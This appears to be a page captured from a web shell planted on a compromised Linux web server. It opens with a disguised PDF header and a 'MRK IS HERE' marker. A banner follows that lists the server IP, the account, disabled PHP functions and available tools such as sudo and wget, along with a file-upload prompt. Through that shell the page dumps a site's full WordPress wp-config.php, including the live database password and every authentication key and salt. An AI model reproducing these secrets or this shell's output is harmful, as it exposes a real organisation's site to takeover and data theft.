...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.216.86 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'alasaweborg_db' );
/** MySQL database username */
define( 'DB_USER', 'alasaweborg_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'DdVMT1r8l]oE' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '#%Yvy-ZAREzVd|zs)2OCfzd0lGYphHtvDwtiy3:Te=+t.{Gv.L}={ &1,KjR7=g>' );
define( 'SECURE_AUTH_KEY', '5`gm3`D0LER#C!,8h.3yY6+Gm8Tl9GCu/bL[c@!Md$mt~WMJ%Cg=&9(ieb&6INu7' );
define( 'LOGGED_IN_KEY', 'n24%oVi3`J_/FsH.$k$.VX/2ji:qn=:~H;d0T~Xdfnz`=mYvqh4z$K&0JQY]T-2 ' );
define( 'NONCE_KEY', 'Z&bfTPcKVn6#k@*nk#v{GIn7t<D 0%5iPb3<|nmd[R_[c-)*|6hwJ:>gIT*W1l*Z' );
define( 'AUTH_SALT', 'u~TrIL pz91i#mQB$B^L<=vgVQ={8g92go7EL)SN]c$ZH*1%9gsEj_2t&M^:Q-2t' );
define( 'SECURE_AUTH_SALT', 'nPn(^vO[*)DJh:aW,{xy5]5CWo^H!ii@;ei2PJpcqGf4r*ah]v~c8m#jGj}0{biQ' );
define( 'LOGGED_IN_SALT', '4=hZ&3g/(hCUB5q3A4E$F^;uokE<32Lk^OD$x X-Z`bA7Vv$!+Wgq`R>M^=j,@<$' );
define( 'NONCE_SALT', 'qo/I? E!#heBC)OGAgUQa&%;a|,IJ|{|>huu];HA$95[8bPqw<bF2Y??wma#`=-]' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );
define( 'WP_DEBUG_DISPLAY', false );
define( 'WP_DEBUG_LOG', false );
define( 'SCRIPT_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
define('WP_HOME', 'https://alasa.org');
define('WP_SITEURL', 'https://alasa.org');
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );